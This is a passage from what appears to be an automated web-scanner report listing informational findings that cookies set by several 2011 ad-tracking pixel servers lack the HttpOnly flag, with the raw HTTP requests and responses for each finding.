rsiPus_xqR7="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIshOB9JrGlJ9XZP2PSMq545hyVBVJdSnkgvS5ixQ2jzsY0ZWA+JOFBhqviZCWubV71mmTZ/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJ61W1sllb6Nc3moNgaTi0sWkkQCbNz7hXNo2IsC53dW3VuuZsmJb9X0AgiDcheSzlnAsnUq4LYdtCMaskgIpbgmkSHb9PrS66rT7Grgzql7HtldL8iE5xypWITXabh97tTpkU/qmOFPl2cWsADKk2Rc1gNqCs/wCa2GpcRYzsBBlGWu1Rx6Ss0719jAJPt3A0/cgXMK9v1+nMWxleyRS9Py7rbiFbkbA4dy82s+YNiWD1Bp0B/8YPQvjz5m6VsPK2bApJbudN0kRmgDQwBFdNYNT3Zod7YBYp+BG3MVnzNBbnI+yHUMxY8gaTCU7GSuHnVmZTUzeXLyNzdjGXICYBnSWVVzTm1uYa+UU29wqPQ14C9Ay7tt6GPEWSA5zQxfYzeLi20J0Nl7IC6vXnM8Od1ipWmbzVPXl7hr95e/RGmwPBkmqRC5aamjDudjkvgSbR3b42ft+lD1GQzV25ioqJNKAAsRVoMjgqHOtgRDBe0DOKYrT+tMQWMGn6nEChsmBKyFveyHmvauyQe182HvP5WE9xxj/WW1VFGrZH10B6y51pelmZhY2yUVhLbCHFAF1wgg9I1NLCQ22j9FIDUznCf6vIcdZKG8/ZdiKwDfKAnA8AB53vXcXDFW+bqz0Qi9tJP3HFnfYb06h1kepNXQWZKlZVW8wLE6GcYgBaTn7Edmli85qT4S83vxtkUUbMAtf+b0E1nSeX3q+qrQ2YpBw97usUXF9qEw1Kga7ue4/koD8yQel/qNlEjame/tLJ0jduVB+ytBY9sF93mgbUlL2ZeG9dCIkZ+m+iWAynUZGRAG3mH4zdRt6QJFtJnrSudJUxkSp36hMpMqoyWjYf/0Dzxx8sSoHwbQLc7K4XYWzwFKXoqtXqULfas/iA=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpj7P+LBAm++DA1mQ19Ktk0xHtNbUdnsuhledavN12kASJwVH5lHOqeC4o2fHI9QkQeon8inPHPsPHufQb0id4nnMJw2upjcbtYuTDvN446mDNk0rjriNSbgDKZc06/pZLd8/z5IM1+qarydvJImOaUCavF5tQ+vJTy0vmLIKK5JakfcZvZ6vY5TRBbUhvbhTFBLWagpBIVk9PAmF2iRJOeh7n11Dcn8bkilhzvJuOwSrWjLV4c1dKSmGQXQgUCCrlrfg5dBoy/uKX5D/DErzUQPBw5wzlcHY0pwcQ4ohqHveeUO1fCklYt3yNLi8Ih4fiXA7KtiQmAv01haIfBqzbc3dy7UBOXBFA5UQx+zZY6T+r0AEWHCqu9zrcpE/K+dhafAfZdl6F9XwAK29pKStK8Vmo/hIZWj6P4pKDIwHnsIzs/CsI6oGdONCs57jOPg55C+8Eo4w2eN8X6XGvloOwC16CAbvKgsBHdOES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafiVSeTecIJRVt18r+Pf6AVQ9smmgMCZPjqwiXHhyXFqLJwepQkHnViNF27BPMR76afEDXmQK4X5YtD+7lbiGoEtKEsos76lXkFDeXHHplOgEvw0R+YSyi6fZVTgUbyYjzKicP8ItTRSjGP+9wmw4+6IWPluELGIVZSpte+L2p8Ak8G+6f39QiQNX9sYMuyPRDbuBHfKyeNWHJBFhuqK4/xZ7D/CTqehq/ghqdhipMBw5Tkr8mdUR/zxczguAqS4lU2jGjyE9g5myCi05INSSRNE5L4DNh54JKfld0ePji0KKkmwnQEKhnIFcxkTlb237bhRQDP++3zP1j2hiLU3mg4xi1Bay7LsKGEYilyYgtuJxssb25KbKk0l2Nx+BftGsREymmYzUPlB6j58myYGRehdpGh0wJvXFJhEomvMt3+RVVtU/Hs/dJeH/HekE15CjTKMwIovoWyWLWkLk/6AzLofDM76Xj3/75JEbK9bptsRjxMDFAem9ySqV4jf0esg7pJ4iPlT5pMZ10V4CW1LSJQcWkybORfD0N5UTmssjs9H6zArVaijt0fVauRh7dRVBdULPsaJ7riVOn6Uyy3PpnD9ux5E93rqsEK1x7fbJO18nv264KJ7YWZM5gXP2LEWHxvabbxbwwGJ1QhIMhDB0OoWtqmkDKiV/MucnamXFEmet8G/Cjst1gkpmYPuG6pBgUPehivSI0fOzA0wV/YCP1uYirYyEalVKutJsu2eWT6Je8BzKdbq10UjW6IpkVn4Go3iH0RzBFoGh24tA44C3aKTJa/2frujwGy2nzvvlF0sL6Rj1PGg46xmLjjYE5SjtBW0D/I+k61vl+3uQyzZb33wWkGruFU4eK51kxOG6IX6C3L2EZDPaFw5tQnQjHUEIn0UPw/CZ7yH+a0h5BL5t32WMOXQTwq/Vl4lnroXyo6Vhf1SzulnavN4Twzu12B47v"; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ8U7xE84mx8cR/xmi3McKUrpVsIwOgHBRuY4DkmM2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oL6zR/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkcZJg/g==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_dGQ8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP140+heAIMpTaxq2F29/wEqICTC+brKKetXjEYxEHjqS7MnHaRoUlyJPW5vrupC8lCy9ehMcr4ODX4dHdKCYd/6y296vcGNEHfOnzJmYoq5HbvUag4QdvsB/TUdj97Y2l4hX6POJLvxOP5q4MMsb0mFfZnJD5FY+evU/J9EwIoHF6Ryogng+mKbzxZbyyINuKOL587OsIT8jeFhm5ylsZ7zOhHCu4TeF8pc3gTw/vYSsm4r45Z2ho7FmtfNtdxEQKHkNamcv3FsbbryorVcz7sKAPVMqaKbhfFllHqJzyxIFBoc+mKfq2EsN4XWKT6n1/HFvSFWLrjasZj/i4XnGahI+mfpY9ze4yT6Fukh+2dat0dsd5Az1U7XymvwdaUjFbT9uOwMmm16NS5hFRSnjnoXFW4CQf+gsTKK+yDjOzwsxv/qEqvN4mYoytFphSsb6P6VYeoZUAFC0iJViSnGkEoTohDSBkmpV9lXsjVfSk06Grg/75Qf9qa99ABoptQWJO2OK3W0h0tVPjjp66vSIysMCV04DrntT6KsP3P+yzwSqNhUD2VMbIyFMooyg==; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mGHo=MLvntzUpZghnJ5G+i+4DV0q7j9FMVCqRtwDvSy+4/qSYgqJKSe72X4w1OsoqG1L6pBK4c+pnxqlazyrETdH5Ss7ZqlAdp3dLz6RiXrd8bWUl0XLFTZoGRlkMvbxWlLJYvRKeW3BPG7e9ZE9B61Tr0Xu8xr7ySWl2ozQ4/U5ZrZxIJ7kQJbMCJWim30MttesFLXZH5EHs6+uRDgRTkZlnHHCB77Ar7hGyOMIesNI9o8/9RNCHjTBvKoYXcOvvnUc3gREPcmtRhgTUBzhJDfhW9iRzZqad1BMkEEMigM51rz87fTY2vzp0koSexDIeushDPwx5lSSemwqHa5nCxRqJDEJhHQKSLfJHzzuMS4QVFpr7//ar/gYMlqPHm+a7O2rKfqFedotktJgoyGoTtvvVeB1WgObPStSqC654B4pjqVzgkVcIp5vS64Z3X4Vwz7RGYuKOb0DaoyX1X76ErVivTuwcME8UIBHjBcbckhVImU4XnKI4J4bfm8SzPc7fEarHQ8eNRbt+NBqpHVfT8CA7WCswlaUKX5R2m/uP1k7D7OapV5fM7s4PFkZLVBzums11/pRTr+vH3zlZ2D1U6oJOxBq6h1nGt8lsO3aycDlfPhTnFCbJtqhd+R8M00mgvtcV2kPHAZhTBULpYa3VoOxt75s7s+OXEMD8kJDhqhAW0xOaaqojt1m2kfCd2fjCHuHb0cRul18AwkGu6zC9b5gjvQWYaAWvEuTjULQnF3/WBu3xoBmBW78cFOqZVsnCJpwlzNwpDnZ/nr094/gLpsTcBz9U0VyWch6xgNeriVs3uCZ+hcbdM5qZSIVPm40FjrdWmJOt2Ypv3a/kl5qli5IOjokQLYqfkHaXdYfke+D9DK5fPp0x3F/DMW5VklD0s2klQ6FvQ8nGV4uNs6prIO+bLFyIVZRDiExpXuh+i+Aq1YmAP/ufHvFjsYKn3OEk5XDAygQ1YpMtM5Sk37DHiy1Oc7bt3PwrwRKxpdfhkxPbOgtaPJkKIgXA1UHBSrD2OZEGtvDFWcANJwDR0VNWid5NgBAB0rwWy6Z9LlselJpaiIgXIaF5h7wv7cU7Y0uZfy2iNM4rSYzqVMnAijA51U4o2W5ntA6EoeSq35Bx9QMDeHIURaKeaZsajRx5lGVOxUpye6PvZN0uuGaga4RrhslZMB2Y9+AWtEFXlROcqQmBVEWszH66koC2U73qDz/yRQrV2HzX7gNGvoPo58JQSjatu9X7ji5cy1E8461WWwOgVp2IkrMWGs11l2+HIs523HQXWBw52AChb40Qk34XWJQuyHfZL9BKo9bD6pY3NmKKLrvbGYtN9z9spKNvqELg64UUhZHAp4leheD4a45ZJaEWok/2mPfmsjSGHyI+cNW11/VKbLveqgLdpHuwgIOrGn+E8XL1rY/dmTnJljXVje3GS73qe0gFIUORmV3zEUoMu8lptwsGFRNaLlIlfH4o/sxxcLaUBc19572hk00yHldk+1d96w8WPNpYQKcbuFCWBQC1EktKTN64aS3+Ym84VuWwrnmLsUd+YZBuBFuReQ3pxDY7f9Wawu8mnlboSNWsLrjMJt5gOyEZGvTAlzDiB1dDEroCTz/E9E4GpyJPKfuKLsHuCzLY21x7DZuu5S8mZ7fh28cQxt+2YLsEHn6UBTWD6KoqxACfoIaPep7kzEs=; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=MLv39S8pLipr557JcaE6yAV6rsvwpilMo4IXeAwquaRybQYECDUgDLKZcrtp+fSv+Kv8zwptsA0XKpUy7HBR0/FP1LWEh4VBn8RQKgG1Jl2axyTANa3oP9nI5ve45EGiWh9Sl6iFkM3Zn4EL3+sUxrCfghQpknxyU1jd7+S5yLCbsj+1OFD+aVulqZhDIHtO1fmlkEweR/oQf+X9G8N6KIBLzbafY5Xxm2tCUkjBkJZ/Wd7uHPSPg7Zg7RoQmJ3O+XHxIVD/v7sFXCy9JGnICxoeBIIkhJwhb/PWqt9lGmZWbUzK0rIweM30j8C21o0fOUQmurYcgouTou4TFLbI4lQZ1kO0EyUCLGrP/XBqZiIEVXq4SYb6fzmRS+wyQum7qFWWDXX+x587vHctOQDNqJT99KvyBLa9BM8WDZzjtTB5qGiSfDXn7JG014dYb9/r58Vl/RlZz1cFRA2+CV5qnnJV+VUpKIuRPQ+S4E6r3YYXbT3vWeDASYs3TRpgPz2WbAwtezXTCQNZmakONCVtwV34fTEwsDm02I/Kkdi5iO/Ogp7wYPugmyecctFFcu7w0d5AkuLRkWrm4znT7x5QDMsXvbfjq28uoXLhty4funVrOjX2AxtU7nhBAEB/cxKn8rCdaxEyNnyvZsMRj6knGyDs/UqXdC8Nak/6K/Bpq9XPItguKY/eXp/cUAy/SnwDM60mCzOEgcjDwwk4kGDFcuXwMlFyUTdf9aXpue5o4qc6SkNOQMUSgMRcxD+ZiO3IhfCNDu+qUbosXm0Y0Jk456/rjrkzzF2a0UKzeAwazNZfir2djSN9zhhqqiI8IVTmdg9kMr35BAQqoYnUDg7pR+rnW8ft0kt/DUTaKqms6kynaJYO+sZ+fUlOpZjWPeAfLRQlNOhyY3GOTh+uVqhsVaoqTRqSWnSNkbfumeGvbXPye12/bZ0SkP4rZ7q82ccniej55lG4/yMKnb1cFmca3crDCyMPTb61By3RIJhNlDC/iLX9hcRmn8Vpq/S+koinK3Myi0+6cIUKtxI1FfGx1HeIsTKskbad+KOwIU/oFassZ+W0ij0JQo8+lcK1uqEF+tjLEwGGHoe5UID/ImippNwxev+aeym6TabxFDPf4tPKFgyVLvrw61qMEi3Iy8+A2h4Iyq332msEqwAXnYJvdndEVKh2ylvSl+F+7qo0BkbvNguFwmdxpwNlESXYu15Bm9mZjIHD+l3VV6E2EEiSInQE6GvFiAywxdeyN/XGIWo1NrRnQCG3YQj4t87H5slGjT4D6NFOI807ITiQXMAo5xDF15nd0FzNrJ6UAx8le1LqIaeqhuIk5hQJ7YxjXLB7GA==; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd51&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 13:59:45 GMT; Path=/
X-Proc-ms: 13
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:44 GMT

GIF89a.............!.......,...........D..;
10.97. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dab4fa85facd099 HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304471552277%3As2.33%3D%2C3390%2C2740%2C

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7527692047%3As1%3D1303122295815%3Ats%3D1304949937737%3As2.33%3D%2C8131%2C4401%2C2751%2C8801%2C8261%2C6571%2C3831%2C7051%2C7651%2C6561%2C7661%2C2740%2C4411%2C9221%2C7671%2C9241%2C8151%2C5481%2C571%2C6581%2C8771%2C7621%2C8291%2C8301%2C6531%2C8171%2C2231%2C8781%2C4381%2C3321%2C7101%2C8311%2C8791%2C5451%2C8181%2C4911%2C7641%2C5441%2C2811%2C3761%2C7591%2C5911%2C2801%2C4472%2C7111%2C3771%2C5431%2C7131%2C5902%2C1051%2C3202%2C5421%2C4451%2C6651%2C4461%2C5411%2C7121%2C8761%2C2791%2C5891%2C6641%2C4941%2C8101%2C8711%2C581%2C8231%2C3741%2C5941%2C7561%2C8111%2C7141%2C4441%2C1061%2C591%2C7161%2C2761%2C8241%2C6621%2C4421%2C5391%2C8721%2C4431%2C601%2C3241%2C5921%2C3721%2C8121%2C7581%2C5381%2C5021%2C3161%2C3711%2C7531%2C8391%2C8001%2C5012%2C7521%2C6111%2C5601%2C6931%2C7541%2C6091%2C6941%2C6461%2C8041%2C5591%2C6951%2C6131%2C8431%2C3193%2C5051%2C6411%2C8421%2C4501%2C5572%2C6961%2C8061%2C4492%2C6421%2C6121%2C7511%2C4481%2C5581%2C8051%2C3171%2C6431%2C2571%2C6971%2C8331%2C6501%2C5552%2C5081%2C201%2C6981%2C2141%2C8871%2C8321%2C6511%2C6991%2C7461%2C4592%2C6041%2C5071%2C7961%2C4581%2C7001%2C8881%2C8341%2C5061%2C6471%2C7011%2C6071%2C231%2C2651%2C5111%2C7971%2C6051%2C7031%2C6481%2C5512%2C7991%2C6491%2C8851%2C6331%2C7891%2C2441%2C3521%2C4071%2C2981%2C8541%2C6321%2C5221%2C9081%2C7901%2C3541%2C8512%2C2461%2C9061%2C7881%2C3551%2C6791%2C2452%2C7381%2C7921%2C4101%2C5192%2C6841%2C5731%2C7931%2C2951%2C6291%2C7391%2C9051%2C3561%2C8551%2C4051%2C6281%2C2491%2C2971%2C7361%2C5211%2C3571%2C4671%2C2481%2C3581%2C7373%2C5751%2C4061%2C2961%2C7831%2C341%2C7351%2C9011%2C8471%2C4681%2C6391%2C9021%2C2501%2C4691%2C6862%2C3071%2C5181%2C7811%2C5171%2C7821%2C3481%2C4031%2C6851%2C6371%2C7341%2C9001%2C3491%2C7861%2C5131%2C6361%2C4711%2C8501%2C7321%2C5121%2C7871%2C8991%2C3501%2C6901%2C8481%2C4721%2C7301%2C7841%2C5151%2C3511%2C5682%2C361%2C7851%2C5141%2C8971%2C5351%2C8671%2C7771%2C4751%2C2311%2C7291%2C4271%2C2851%2C5831%2C9202%2C8661%2C4741%2C951%2C6201%2C7281%2C6661%2C4281%2C2871%2C5842%2C4761%2C6181%2C5361%2C8641%2C6191%2C7751%2C7261%2C6711%2C8701%2C5861%2C921%2C6171%2C5871%2C3911%2C5321%2C4771%2C8691%2C7251%2C5332%2C4251%2C9162%2C7791%2C6691%2C8682%2C6151%2C431%2C4791%2C6701%2C5881%2C421%2C7781%2C2841%2C9151%2C8601%2C7711%2C3881%2C3341%2C4801%2C7701%2C5771%2C7221%2C5781%2C4351%2C6721%2C9131%2C2932%2C6241%2C7691%2C8591%2C5791%2C4341%2C2941%2C5311%2C7681%2C3351%2C451%2C6733%2C9122%2C3891%2C6771%2C5251%2C3851%2C3362%2C9111%2C6232%2C5261%2C8631%2C5801%2C3841%2C7191%2C971%2C3871%2C9101%2C5811%2C7181%2C2901%2C5271%2C6211%2C7721%2C3390%2C7171%2C961%2C4311%2C6761%2C5821%2C3861%2C9091%2C; Domain=.33across.com; Expires=Tue, 08-May-2012 14:05:37 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:05:37 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;
10.98. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=64 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:00:14 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 13:59:54 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304949614+ \"5\": 1304340362+ \"4\": 1304340367}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:14 GMT; Path=/
Content-Length: 508
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://r.nexac.com/e/getdata.xgi?dt=fi&fn=adrider&pkey=tubw72p3ncbzv&repequal=-&reppipe=%26code%3D","javascript"
...[SNIP]...
10.99. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1302356071;fpan=1;fpa=P0-1958234894-1304949604185;ns=1;url=http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel;ref=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304949604184;tzo=300;a=p-25CIknq_eSg16;labels=MediaServices HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EPgAJe8kjVmM-5GL0ZmY8frRi58oyBABvAEB2gaB9ACa0aOZWBDxiz0cxeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4ZShzCW1OfFABNIA6JIA4QC-ILZLEIJIstOUo4sj

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/pixel?pixelID=50185&partnerID=134&clientID=5061&key=segment&pb=0
Set-Cookie: d=EPUAJe8kjVmM-5GL0ZmY8frRi58oyBABvQEB2gaB9ACa0aOZWBDxiz0cxeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4ZShzCW1OfFABNIA6JIAww0b4gtksQgkiy05SjiyMA; expires=Sun, 07-Aug-2011 14:00:05 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 09 May 2011 14:00:05 GMT
Server: QS

10.100. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=2931142961646634775&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1185=2931142961646634775; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; 